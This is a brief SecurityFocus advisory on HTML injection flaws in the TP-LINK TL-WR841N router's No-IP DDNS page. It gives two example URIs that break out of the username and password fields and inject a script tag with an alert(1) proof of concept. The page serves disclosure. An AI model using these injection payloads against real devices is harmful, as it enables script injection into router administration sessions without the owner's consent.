TP-LINK TL-WR841N Router Multiple HTML Injection Vulnerabilities

An attacker can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/userRpm/NoipDdnsRpm.htm?provider=3&username=a1234</script><script>alert(1)</script>12aaa34f5be&pwd=password&cliUrl=&Save=Save

http://www.example.com/userRpm/NoipDdnsRpm.htm?provider=3&username=1234&pwd=a1234</script><script>alert(1)</script>12aaa34f5be&cliUrl=&Save=Save


 

Privacy Statement
Copyright 2010, SecurityFocus